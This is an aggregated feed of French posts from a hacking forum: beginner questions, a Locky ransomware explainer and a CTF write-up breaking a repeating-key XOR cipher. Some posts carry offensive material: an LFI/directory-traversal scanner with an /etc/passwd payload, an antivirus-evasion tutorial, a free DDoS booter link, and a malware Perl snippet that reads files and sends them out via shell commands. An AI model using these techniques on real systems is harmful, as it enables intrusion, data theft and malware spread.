from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1RcwjE6
via IFTTT

samedi 19 mars 2016

News Création d'une plateforme de signalisation de faille

Bonsoir a tous ,
Mon projet est de créer une plateforme pour Whitehat
Comment ça marchera

Un whitehat détecte une faille sur un site .
Il préviens sur notre site .
Et on se charge des formularites :mails téléphone .

Demande :
J'ai besoin d'un programmeur pour le site web ^^

Merci


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1pTKY01
via IFTTT

Recherche livre forensic

Bonsoir a tous ,
Je créer ce sujet car je recherche des livres et pdf sur le forensic que ce soit anglais ou français m'importe .

Merci bien a tous


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1PjzOGC
via IFTTT

Stegano découverte en partie - Besoin d'aide

Bonjour mesdames, messieurs,la communauté,

Pour ceux que cela intéresse, j'ai un petit sujet stegano que j'ai révélé en partie. mais maintenant je bloque après avoir eu les indications "LSB" et "enigma", qui sont cachées dans l'image. je remercie par avance les personne qui prendront un peu de leur temps pour m'aider dans la résolution de se problème.

image_4.jpgimage_4_luminosite.jpgimage_4_luminosite_saturation.jpg

je vous mets le lien vers le dossier contenant l'image decomposé. http://ift.tt/1UpSAnq


sinon je vous donne les essais réalisés(en partant du principe que enigma est un string et que LSB et une indication pour Least Significant Beat ) mais sans succès :

enigma

BINAIRE
01000101 01001110 01001001 01000111 01001101 01000001 = ENIGMA

LSB 1BIT
01000100 01001111 01001000 01000110 01001100 01000000 = DOHFL@

LSB 4BIT
01001010 01000001 01000110 01001000 01000010 01001110 = JAFHBN

LSB 4 BIT PUR
0101 1110 1001 0111 1101 0001 = eVoM
____________________________________________

enigma

BAUDOT binaire
00001 01100 00110 11010 11100 00011

IA2 LSB = TINJUO

IA1 LSB = ABIMR\n

BAUDOT LSB = ABIMRÉ
Images jointes


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1UpSCf1
via IFTTT

vendredi 18 mars 2016

VPN-Toute la maison

Bonjour groupe,

Est-il possible d'avoir un VPN à la sortie de mon réseaux? Je ne veux pas un VPN pour chaqu'un de mes PC, qui lorsque j'utilse un VPN sur un PC, tout est ok pour surfer sur internet, par contre je n'ai plus accès à mon réseaux interne. Chromcast, NAS et imprimante. Donc, si je veux surfer anonyme ou autre raison avec un VPN je dis adieux à mon réseaux.

Est-il possible d'avoir un VPN qui va pas me nuire sur mon réseaux interne? J'ai Untagle, peux être que je pourrais avoir un VPN à la sortie? Ou un Router ddrt?

Comment résoudre cette situation

Merci à vous


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1MglaFi
via IFTTT

News Booteur gratuit 400sec

les gars ;)
Je vous présente un booter gratuit de "valeur" 400secondes,
Je vais pas vous faire duré plus longtemps, le liens :
http://sh.st/TOCsn


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Lw7nuj
via IFTTT

Tutoriel Résolution d'un challenge CTF : Decrypter un GIF

Bonsoir à tous.

Alors, aujourd'hui, je vous reviens avec la résolution d'un challenge tout droit issu d'un CTF auquel j'ai participé durant ce bon mois de Mars.

Voici son énoncé :
Someone used this NSA-approved-backdoor-free encryption program to encrypt the following file. Can you decrypt the file and prove it’s not so secure after all?

Et voici le programme fourni :
Code:

import os
import sys

KEY_SIZE = 10

def expand_key(key, length):
        return (length / len(key)) * key + key[0:(length % len(key))]

def xor(s1, s2):
        assert len(s1) == len(s2)
        return ''.join([chr(ord(a) ^ ord(b)) for a,b in zip(s1, s2)])

def main():
        if len(sys.argv) == 2:
                key = os.urandom(KEY_SIZE)

                filename = sys.argv[1]

                f = open(filename)
                data = f.read()
                f.close()

                expanded_key = expand_key(key, len(data))
                data_encrypted = xor(expanded_key, data)

                f = open(filename + ".enc", "w")
                f.write(data_encrypted)
                f.close()
               
                print "File %s encrypted with key: %s" % (filename, key.encode("hex"))
        else:
                print "Usage: %s <filename>" % (sys.argv[0])

if __name__ == "__main__":
        main()

Et voici un lien vers le fichier crypté fourni :
http://ift.tt/1R42qJm

L'analyse
Si on lit le code de cryptage, on remarque que celui ci génère un tableau de 10 bytes aléatoires qui sont ensuite répétés pour que ce tableau ai la même taille que le fichier donné en entrée.

Ensuite, le cryptage en lui même est fait via un simple xor.

Retrouver la clef
Notre problème, ce que nous n'avons pas la clef.
Par contre, nous savons via le nom du fichier (flag_800x400px.gif.enc) qu'auparavant celui ci devait être un gif mesurant 800 par 400 pixels.

Il faut savoir qu'un fichier GIF, comme tout autre type de fichier contient une entête relativement fixe.
On peut trouver une description de celle-ci ici :
http://ift.tt/1jhFUzu

On y apprend que les 10 premiers hexas d'un GIF sont :
  1. Les caractères formant GIF, c'est à dire : 0x47 0x49 0x46
  2. Le numéro de versions sur 3 hexa : 0x38 0x39 0x61
  3. La longueur sur 2 hexa (en little indian) donc dans notre cas : 0x20, 0x3
  4. La largeur sur 2 hexa (en little indian toujours) : 0x90, 0x1


Nous pouvons donc refaire un xor entre ces informations et le début du fichier encrypté afin de retrouver la clef de chiffrement.
C'est ce que je fais dans le code suivant :
Code:

>>> def xor(s1,s2):
...    return ''.join([chr(ord(a) ^ ord(b)) for a,b in zip(s1, s2)])

>>> f = open("flag_800x400px.gif.enc")
>>> data = f.read()[0:10]
>>> data
'\xf5#\xce\x8fj):\xb4\xdb\xf1'
>>> len(data)
10

>>> header = [0x47, 0x49, 0x46, 0x38, 0x39, 0x61, 0x20, 0x3 ,0x90, 0x1 ]
>>> headerHexString = ""
>>> for i in header:
...    headerHexString += chr(i)
>>> headerHexString
'GIF89a \x03\x90\x01'
>>> xor(headerHexString,data)
'\xb2j\x88\xb7SH\x1a\xb7K\xf0'
>>> exit()

J'ai donc pu récupérer la clef.
Elle est : '\xb2j\x88\xb7SH\x1a\xb7K\xf0'

Decrypter le fichier
Grâce à cette clef, on peut modifier le code de chiffrement afin d'en faire un code de déchiffrement.
Voici un code d'exemple :
Code:

import os
import sys

KEY_SIZE = 10

def expand_key(key, length):
        return (length / len(key)) * key + key[0:(length % len(key))]

def xor(s1, s2):
        assert len(s1) == len(s2)
        return ''.join([chr(ord(a) ^ ord(b)) for a,b in zip(s1, s2)])

def main():
        if len(sys.argv) == 2:
                key = '\xb2j\x88\xb7SH\x1a\xb7K\xf0'

                filename = sys.argv[1]

                f = open(filename)
                data = f.read()
                f.close()

                expanded_key = expand_key(key, len(data))
                data_encrypted = xor(expanded_key, data)

                f = open(filename + ".gif", "w")
                f.write(data_encrypted)
                f.close()
               
                print "File %s encrypted with key: %s" % (filename, key.encode("hex"))
        else:
                print "Usage: %s <filename>" % (sys.argv[0])

if __name__ == "__main__":
        main()

Si vous l'exécutez en lui fournissant le fichier crypté en entrée, il vous regénérera le gif suivant :
http://ift.tt/1R42qJt

Et ce dernier contient le flag (le mot de passe) pour gagner le challenge.

Pourquoi ce chiffrement n'est-il pas sécurisé ?
Le problème de cette technique de "chiffrement" est qu'un xor est inversible si l'on connait le texte en clair ou une partie de celui-ci.
C'est un problème connu pour d'autres algorithmes dans certaines configurations (des paramètres de RSA mal choisis).

Comment corriger ?
Une méthode pour corriger ce problème est d'utiliser un autre système que le xor, les modulos par exemple.
Une seconde technique serait d'augmenter la taille de la clef. En effet, si celle-ci est plus grande que la taille du header du fichier, nous ne pourrons pas refaire complètement le xor qui nous permettra de récupérer la clef via le fichier encrypté.

Conclusion
J'espère que ce petit exemple de résolution de challenge vous aura plus.
N'hésitez pas à me poser des questions ou a me faire des remarques si vous en avez. Je serai heureux d'y répondre.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1RrHgR6
via IFTTT

Je veux crée mon autoshop !

bonjour, alors voila moi qui me debrouille pas trop mal dans le css et html ainsi que le php, j'aimerais cree un autoshop a partir d'une source.
mais je n'est pas de debut, en gros je veux une source et la mettre bien a ma sauce
voila donc celui ou celle qui aurais une des sources d'autoshop tels que..gustavocc ou dark-planet venez en privée ! merci d'avance PatrickL :cool::cool::cool:


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1R8ILod
via IFTTT

jeudi 17 mars 2016

Cracker WPA

Bonjour/Bonsoir,

Je suis un nouveau , du forum . Arkadia , jeune de 19 ans un peu touche à tout .

Ne sachant pas vraiment où poster mon sujet , je l'ai fait dans la section "Générales" .

Voilà ma préoccupation :

Tout le monde parle de "Cracker" un Wifi , en essayant de comprendre le principe , j'ai connu l'existence des Dictionnaires .
J'utilise KaliLinux Mais je ne sais pas comment utiliser ces dictionnaires (Ils sont compressés en .gz avec un .txt à l’intérieur . Oui je sais que le txt est le dictionnaire ) et comment réussir à exécuter correctement la procédure car après la commande Airmon , j'ai ce message :
ls:impossible d’acceder à sys/class/ieee80211/:Aucun Fichier ou dossier de ce type .
Et aucune carte réseau ne s'affiche .
P.S : J'utilise virtual Box car avec VM j'ai des bluescreens . Windows 10 .

Merci d'avance .


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1nSQTRi
via IFTTT

Pc lent

Bonjour, Depuis un certain temps mon PC est très très lent. Merci d'avance pour l'aide que vous voudrez bien m'accorder.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/22ppqq2
via IFTTT

Helo

Salut à tous j'espere me faire de nouveau amis et apprendre de vous


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1pO6pQ1
via IFTTT

News Locky - Le nouveau ransomware qui inonde le net


Impossible de passer à coté, vous en avez sûrement déjà entendu parler, que ce soit de près ou de loin, vous savez tous qu'un nouveau malware fait fureur ces derniers temps: Locky.

Qu'est ce que Locky ?

Locky est un ransomware, un logiciel malveillant qui va crypter vos données personnelles (photos, vidéos, fichiers office...) et vous demander une rançon en échange. La rançon est le plus souvent demandée en BitCoin une monnaie virtuelle et anonyme (à l'heure d'aujourd'hui, un BitCoin vaut à peu près 360€) via des liens un petit peu louches qui redirige la plupart vers des sites accessibles via Tor. Locky s'est répandu aux États -Unis en prenant en otage les données d'un hôpital de Los Angeles, puis en Europe notamment en France et en Allemagne.

Comment Locky se diffuse t-il ?

Locky se diffuse via des emails piégés envoyés par un réseau de botnet. L'email comporte un texte rédigé en français, sans fautes d’orthographe, qui vous indique de bien vouloir payer une facture pour un tel ou tel service. Est fournie avec le message une fausse pièce jointe, à télécharger. Une foie celle ci sur votre machine, l'installation de Locky va commencer. Il est bon de savoir que le sujet du message est toujours "invoice_J-XXXXXX.doc" C'est le moyen le plus simple de flairer l'arnaque, car l'adresse de l’expéditeur change à chaque fois.


Un mail piégé contenant la pièce jointe de Locky


Quels sont les dégâts ?

Une fois installé sur votre machine, le malware va commencer à changer vos données personnelles en fichiers cryptés en .locky, d’où le nom du programme.


Vos fichiers contaminés par Locky


Le fond d'écran Windows est lui aussi modifié, il est impossible de le rater, il invite l'utilisateur à passer à la caisse.


Le fond d'écran modifié par Locky

Sachez que les machines qui se trouvent en réseau de partage ne sont pas à l’abri, une fois une machine infectée, les autres le sont aussi, ce qui pose de véritables problèmes chez les entreprises.
Voici une liste non exhaustive des fichiers cryptés par Locky:
Citation:

.m4u | .m3u | .mid | .wma | .flv | .3g2 | .mkv | .3gp | .mp4 | .mov | .avi | .asf | .mpeg | .vob | .mpg | .wmv | .fla | .swf | .wav | .mp3 | .qcow2 | .vdi | .vmdk | .vmx | .gpg | .aes | .ARC | .PAQ | .tar.bz2 | .tbk | .bak | .tar | .tgz | .gz | .7z | .rar | .zip | .djv | .djvu | .svg | .bmp | .png | .gif | .raw | .cgm | .jpeg | .jpg | .tif | .tiff | .NEF | .psd | .cmd | .bat | .sh | .class | .jar | .java | .rb | .asp | .cs | .brd | .sch | .dch | .dip | .pl | .vbs | .vb | .js | .asm | .pas | .cpp | .php | .ldf | .mdf | .ibd | .MYI | .MYD | .frm | .odb | .dbf | .db | .mdb | .sql | .SQLITEDB | .SQLITE3 | .asc | .lay6 | .lay | .ms11 (Security copy) | .ms11 | .sldm | .sldx | .ppsm | .ppsx | .ppam | .docb | .mml | .sxm | .otg | .odg | .uop | .potx | .potm | .pptx | .pptm | .std | .sxd | .pot | .pps | .sti | .sxi | .otp | .odp | .wb2 | .123 | .wks | .wk1 | .xltx | .xltm | .xlsx | .xlsm | .xlsb | .slk | .xlw | .xlt | .xlm | .xlc | .dif | .stc | .sxc | .ots | .ods | .hwp | .602 | .dotm | .dotx | .docm | .docx | .DOT | .3dm | .max | .3ds | .xml | .txt | .CSV | .uot | .RTF | .pdf | .XLS | .PPT | .stw | .sxw | .ott | .odt | .DOC | .pem | .p12 | .csr | .crt | .key

Comment se protéger ?

Il n'y a pas de solutions miracles, se sont les bases de l'utilisation de on Pc: Faire les mises à jours régulièrement, prenez vous un bon AV, faites attention à ce que vous laissez passer sur votre machine... Faites des sauvegardes sur un support externe!

Concrètement, si votre machine a été infectée, vous n'avez pas grand chose à faire, vous pouvez essayer de payer la rançon. Bien que la fiabilité du Décrypteur n'ait pas été prouvée, plusieurs personnes ont payées la rançon et on retrouvé leurs données. Avec un serveur windows, vous pouvez aussi bloquer son action avec des restrictions de fichier.


Le site web vous invitant à payer la rançon

Conclusion

Bref, ce truc est une vraie rie, j’espère pour vous de ne jamais l'attraper, si toutefois c'est le cas, n'hésitez pas à partager votre expérience, le forum est là pour ça ;)


T'cho :D

Source: korben, silicon, malekal, naked security


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1R5XMqQ
via IFTTT

Ebook "Reverse Engineering for Beginners"

Bonjour ,
Pour ceux que ça intéresse, je viens juste de tomber sur ce site web qui propose de télécharger un E-book qui me parais pas mal.Le PDF fait 942 pages dans sa version longue , mais ils proposent une version "lite" aussi qui fait 158 pages. Voici le lien: http://beginners.re/


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1pqeytF
via IFTTT

mercredi 16 mars 2016

Présentation freetoot

Pseudo (+autres si plusieurs) :
Connaissances informatiques générales : Débutant
Connaissances en hacking : En apprentissage
Système d'exploitation principal : Linux/WINDOWS
Je viens sur ce forum pour : Apprendre
J'ai connu ce forum via : Google:D
Informations supplémentaires (job, intérêts, autres...) :


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1RkMjsM
via IFTTT

hello wolrd!

Pseudo (+autres si plusieurs) : mich
Connaissances informatiques générales :BEP électrotechnique, Python, C, Java
Connaissances en hacking :2 ou 3ans sous BT/Kali a suivre des tutos
Système d'exploitation principal :Kali, Apple
Je viens sur ce forum pour :enrichir mes petites connaissances
J'ai connu ce forum via :Google (info sur tool)
Informations supplémentaires (job, intérêts, autres...) :-job: cordiste
-autres: moto


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1S3CgW1
via IFTTT

mardi 15 mars 2016

Le premier cryptographie elliptique VPN

MultiVPN est le premier VPN à la base de la cryptographie à courbe elliptique. Pas plus d'interdictions ni de blocages. Oubliez le droit d'auteur. L'anonymat complet et l'anarchie totale. Restaurez l'Internet réellement libre avec MultiVPN.

Plus de 20 serveurs résistants aux attaques localisés dispersés dans le monde entier. L'absence absolue de logs. Les crypto-conteneurs et le chiffrage de disque complet sur tous les serveurs. Support de RSA pour la compatibilité.

OpenVPN, DoubleVPN, TripleVPN c'est tout ce qui est nécessaire pour l'activité sécurisée dans le Web. La compatibilité avec tous les dispositifs et systèmes opérationnels.

A partir de $9.00 par mois seulement.

Test des coupons: 2o54j62758i, 85cbei27565, 62i758dqmbg


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1pKlvpU
via IFTTT

lundi 14 mars 2016

Problème d'installation kali

Bonjour a tous, depuis 3 jours je m'acharne a vouloir installer kali-Linux en dual boot avec windows 10 sur mon pc.
J'ai donc téléchargé l'iso et je l'ai mise sur ma clef USB.
Je lance l'installation graphique de Kali-linux et une erreur se lance :
Citation:

mount: mounting /dev/SDA1 on /media failed: invalid argument
umount: can't umount /media : invalid argument
Je lance donc en mode Live et une autre erreur fait sont apparition et impposible de lancer en mode live.
Comment lancer l'installation graphique?


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1pjBXNb
via IFTTT

dimanche 13 mars 2016

Python2 / Python 3

Bonjour je suis nouveau sur se forum et je me suis lancé dans la programmation en python depuis plus d'un mois.
J'ai remarqué que la plupart des tutos ou bibliothèque utilisées python 2.
Est t-il possible de suivre un tuto qui utilise python 2 sous python 3?
De même pour les bibliothèque?

merci d'avance :D


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1QQglme
via IFTTT

samedi 12 mars 2016

(Python) mon scanner de vulnérabilités Include et directory traversal

Salut à tous !!
Aujourd'hui je partage avec vous mon simple scanner de LFI et RFI écrit en python
vous aurez besoin du module requests et l'interpréteur python +3.0
CODE
Code:

"""  IDTscan(Include and Directory Traversal scanner ) is a script written in python for Web-audit and penetration testing .
It scan a host for discover  include and directory traversal vulnerabilities  fastly !!
The author isn't responable for all damages caused by script
Author:Had1x aka H11
licence: GNU GPL V3
Requirements :
-requests module
-python version + 3.0
Installing requests in Debian-based distribution :
sudo apt-get install python-pip
pip install requests
Usage:
python IDTscan.py http://ift.tt/1O73Z9g
./IDTscan.py http://ift.tt/1nFFZyb; """


import sys
import time
try:
    import requests
except ImportError:
    print ("please install requests module with pip ")
    sys.exit()

if  len(sys.argv) != 2:
    print ("Usage : python IDTscan.py  https://www.domain.com ")
elif len(sys.argv) == 2:
    domain = sys.argv[1]
    include_url = ((domain) + "/index.php?page=http://ift.tt/1kZGI9X;)
    directory_traversal_url = ((domain) + "/index.php?page=.../.../.../.../etc/passwd")
    print ("_____ _____ _______")
    print(" |_  _|  __ \__  __| ")
    print (" | | | |  | | | |___  ___ __ _ _ __    ")
    print (" | | | |  | | | / __|/ __/ _` | '_ \ ")                 
    print (" | |_| |__| | | \__ \ (_| (_| | || | ")
    print (" |__ __|_____/|_|___/\___\__,_|_||_| ")
    print ("")
    print ("author: Had1X ")
    time.sleep(2)
    print ("")
    print ("[+] scanning : ",(domain),"...")
    print ("scanning for include vulnerability ...")
    r = requests.get(include_url)
    if (r.status_code) == (requests.codes.ok):
        time.sleep(2)
        print ("[+] include vulnerability was discovered:\n ",(include_url))
        include_vuln = True
        time.sleep(2)
    else:
        print (" [-] include vulnerability was no discovered ")
        include_vuln = False
        time.sleep(2)
        print ("")
        print (" scanning host for directory traversal  vulnerability ... ")
        time.sleep(2)
        d  = requests.get(directory_traversal_url)
        if (d.status_code)  == (requests.codes.ok):
          print (" [+] directory traversal vulnerability was discovered :\n",(directory_traversal_url))
          dir_trav_vuln = True
          time.sleep(3)
          print ("")
        else:
        print ("[-]directory traversal vulnerability was no discovered ")
        dir_trav_vuln = False
        time.sleep(3)
        print ("")

    if (include_vuln) == True and (dir_trav_vuln) == True :
        print ("[*] host : ",(domain))
        print ("[+]Include vulnerability : Yes ")
        print  ("[+]Directory traversal vulnerability :  Yes ")
        time.sleep(3)
        sys.exit()
    elif (include_vuln) == False  and (dir_trav_vuln) ==  False :
        print ("[*]host ",(domain))
        print ("[-]Include vulnerability : No ")
        print  ("[-]Directory traversal vulnerability : No ")
        time.sleep(3)
        sys.exit()
    elif (include_vuln)  == True and (dir_trav_vuln) == False :
        print ("[*] host ",(domain))
        print ("[+]Include vulnerability : Yes ")
        print ("[-]Directory traversal : No ")
        time.sleep(3)
        sys.exit()
    else:
        print ("host : ",(domain))
        print ("[-]Include vulnerability : No ")
        print ("")
        print ("[+]Directory traversal vulnerabilty : Yes")
        print (" page : ",(directory_traversal_url))
        time.sleep(3)
        sys.exit()

Ps: vos propositions et commentaires sont les bienvenu , merci à Blend pour son aide


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1nFFYuf
via IFTTT

vendredi 11 mars 2016

Donnée Exif géolocalisation

Bonsoir a tous je pense que vous avez déjà entendu parler des données EXIF

http://ift.tt/vCDt1E
/wiki/Exchangeable_image_file_format


Mais je bloque je n'arrive pas a trouver un moyen de savoir ou une photo a été prise plusieurs site indique l'heure et la date commme celui-ci

http://ift.tt/1LhyF7E

mais voilà I need information alors qq peut il partager son savoir

Merci


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1nDUNgV
via IFTTT

News Présentation Jeyreey

Pseudo (+autres si plusieurs) :
Connaissances informatiques générales : Débutant
Connaissances en hacking : En apprentissage
Système d'exploitation principal :Débutant
Je viens sur ce forum pour :Apprendre
J'ai connu ce forum via : Internert
Informations supplémentaires (job, intérêts, autres...) : Lycéens


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1RbYp7L
via IFTTT

Tutoriel Virologie: évasion d'anti-virus

Les programmes malveillants

Un programme malveillant est un programme qui effectuera des tâches malveillantes sur le système infecté , pour cela il existe différents types de programmes malveillant .
Le Backdoor : Ce genre de malware une fois qu'il a infecté le système va offrir un accès complet et en tant qu'Administrateur à un attaquant sans que la victime s'aperçoit de rien . Un backdoor peut-être un cheval de Troie,un RAT,etc.
Le stealer ou keylogger :Ce genre de malware une fois qu'il a infecté un système vas enregistrer les frappes du clavier(mots de passe,donnés confidentielles)ou voler les mots de passe et les envoyer à l'attaquant.
Le ransomware : Ce genre de malware une fois qu'il a infecté un système va crypter ou bloquer les donnés de l'utilisateur et pour les débloquer la victime devra payer une rançon.
Le vers : Ce genre de malware une fois qu'il a infecté un système va faire des actions malveillantes sur le système en toute furtivité .
Le nombre de Virus a largement augmenté dans les années 2000-2005 , pour cela les entreprises de sécurité informatiques ont inventé L'anti-virus
Chaque programme a une signature (md5,sh1,sh256) le but de l'antivirus est de reconnaitre les signatures des malware grâce a leur base virale (base de donnés de signatures d'anti-virus).
Mais aujourd'hui je vais vous montrer des techniques pour bypasser les AV

AV evasion avec un packer
Un packer est un logiciel conçu pour encoder le binaire d'un exécutable pour le compresser un peu comme winrar,7zip,unzip mais on peut aussi l'utiliser pour bypasser les AV
lien d'un packer open-source : http://ift.tt/MLkTIm

Code source
Une seconde technique existe qui consiste à rajouter beaucoup de commentaires ou code inutile dans le code-source
pour éviter la détection des Av .
Note : - Pour cela utiliser un décompileur adapté au language du programme
- les commentaires en C++ se font avec //

Code:

instruction 1 // ceci est un commentaire
      instruction 2

Nom du programme
Le nom du programme peut changer la détection des AV ainsi évitez les noms trop visibles.
- Virus.exe
- Trojan.exe
- Payload.exe
- Hacked.exe

Test avec Facebook.py
facebook.py est un faux script qui est détecté par certains anti-virus !! on va tester les Av avant et après l'encodage du code-source avec des commentaires !! Let's Go !!
avant l'encodage:
facebook.py est detecté par 1 AV
Capture.jpg
après l'encodage :
facebook.py est passé clean

Capture2.jpg

Note:Tutoriel purement éducatif
Images jointes


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1YGNsdQ
via IFTTT

News Meilleure TV 4k

Faut-il acheter un téléviseur 4K maintenant ou attendre?

L'Ultra haute définition a évolué au point où elle prête pour l'adoption généralisée. Ce n'est plus une catégorie chère destinée seulement aux enthousiastes, vous pouvez maintenant trouver une télévision 4K adapter pour tous les budgets. Les performances se sont améliorées alors que les prix ont chuté, et la technologie pour apporter du contenu 4K à l'écran s'est relativement standardisée.

Si vous avez attendu pour obtenir une TV 4K, c'est maintenant le moment idéal pour le faire.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1QMEbPQ
via IFTTT

mercredi 9 mars 2016

Je n'arrive pas à m'auto-hacker

Bonjour !

Je suis entrain de faire un site pour un projet personnel et par envie je voulais voir si je savais me hacker. Bref j'essaie, je n'y arrive pas et pourtant je n'ai fait aucune protection sur mon code.
Voilà mon code :
Code PHP:

                     $conn = new PDO("mysql:host=$servername;dbname=mydb"$username$password);
                        
$conn->setAttribute(PDO::ATTR_ERRMODEPDO::ERRMODE_EXCEPTION);
                        
$req $conn->query("SELECT `Name` FROM `computers` WHERE `Classrooms_idClassroom` = "$_GET["room"]);
                        
                        while (
$data $req->fetch())
                        {
                            echo 
$data;
                            
                        } 

Donc dans l'url j'essaye de mettre un ' j'obtiens bien une erreur :
Code HTML:

Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' at line 1' in C:\xampp\htdocs\poool\computers.php:50 Stack trace: #0 C:\xampp\htdocs\poool\computers.php(50): PDO->query('SELECT `Name` F...') #1 {main} thrown in C:\xampp\htdocs\poool\computers.php on line 50
Donc qu'est ce que je suis censé mettre dans mon url pour me hacker? Merci !


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1RRDnIe
via IFTTT

Nouveau. Je cherche une orientation pour un projet clair.

Bonjour a tous !
Je viens de m'inscrire il y a peu sur ce site et serais ravi d'avoir l'avis de certains sur mon projet.
L'explication de mon projet pourrait se resumer a sa :
Connaissez vous heartsstone ? le jeu de carte de BLIZZARD , du meme genre que magic ( pardon au connaisseur) qui permet a
different joueur de s'affronter via un meme logiciel en se connectant .
Je voudrais voir les cartes enemies . du moins en savoir l'information d'une maniere ou d'une autre.

Je ne vous demande pas comment faire , de regler mon probleme !! je souhaite reelement acquerir les competences necessaires a l'accomplissement de se projet (si c'est possible??).
Je n'ai actuellement aucun niveau et je ne sais pas vers quoi me tourner .. je suis un peu la brebis egarrer qui se met a la programmation... et y'a de quoi l'égaré la brebis ^^ , je suis actuellement en train de suivre un cours de C , et ASM .. j'ai une petite idée du comment.. mais je n'y comprend rien = MAN IN THE MIDDLE + sniffing reseau , des truc comme sa ...
Je ne trouve pas de tuto m'expliquant ce qu'est internet et comment on communique avec d'aute ordinateur ... bien sur les socket , les port https , ssl et je ne sais quoi...


J'ai eu peut etre la la mauvaise idée de penser qu'un hacker etait la personne adequate , qui se devait d'avoir le plus de connaissance sur different sujet pour parvenir a ses fin.. me suis-je tromper??
Pouvez vous au grand maitre que vous etes de par votre experience , m'indiquer la voie a suivre pour realiser mon projet , les connaissance requise ect ...

Je vous remercie tous d'avoir supporter mon ingrate orthographe , quoi que sur certain mot selectif, et vous souhaite a tous une bonne continuation !!

Xexo


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1W97OuQ
via IFTTT

presentation Xexo

Bonjours a tous et a toutes !!
Je suis ravi de m'inscrire sur ce site , pour partager avec vous mon apprentissage en programmation ... tres faible pour le moment et mes envies ou motivations qui evolueront au fils des echanges sur les forums.

-Je suis Xexo , je n'ai aucun aqcuis réel en informatique et en programmation.. j'ai démarrer il y a peu avec le du langage web , php et javascript que j'ai reelement survolé .. apres cela j'ai commencer a m'interesser au fonctionnement de ma machine .. tout bonnement a me poser des questions sur tout.

-J'ai 25 ans , et j'ai eu tres top un attrait pour les jeux video et l'aspect graphique qui ma séduit , j'ai longtemps dessiner ect .. et laisser tomber apres avoir fait (recemment) une formation de graphisme qui comportait deux semaine de code css/html et depuis je suis parter partout et nulle part ^^.

-J'ai un projet precis , qui je pense , necessite que je comprenne le fonctionnement de la machine et sa facon de communiquer avec son materielle .. pour cela j'ai demarrer quelque tuto ASM et je fait en meme temps du C qui a ce que j'ai compris est "un bon langage proche de la machine" .

-Pas de diplome , travail ou aute , je suis pere de famille a la maison .

-OS utiliser = windows 7 edition je sais plus trop quoi ^^

si j'ai oublier quelque chose faite le moi savoir !


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1QHblQS
via IFTTT

Comprendre ce code perl

Hello,

Je suis actuellement en train d'analyser un code perl envoyer par un malware via un reverse shell.
Cependant, n'ayant aucune idée du fonctionnement de perl, je ne comprends pas trop son fonctionnement.

Pouvez vous m'aider ?

Voici le code :
Code:

sub p{pack "H*",pop}
sub p{pack "H*",pop}
sub u{unpack "H*",pop}
sub se{$_=pop;`$d+tries=1 $_.$u.$c$w\@$v`foreach(unpack"(A60)*",$_)}
sub d{se u "END".$u."END"}
sub c{se u pop}
sub e{$_=pop;map{c $_}split/\n/;&d}
sub z{`${d}files.$v$w\@$v`}
e(`find / -type f -name "recipy.txt" -exec cat {} +`);

Je remarque qu'à la fin, il fait tourner une instruction shell via la sous fonction définie plus haut et nommée "e".

J'ai également de l'intérêt pour la sous fonction z. Elle ne semble utilisée nulle part.
Juste crée.

J'ai l'intuition qu'elle crée une url.
Si telle est bien le cas, pouvez vous me donner sa forme générale (pour des raisons de confidentialité, je ne vous ai pas mis l'entièreté des valeurs des variables) ?

Merci beaucoup.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1nvFxmb
via IFTTT

lundi 7 mars 2016

Bloquer réponse DNS

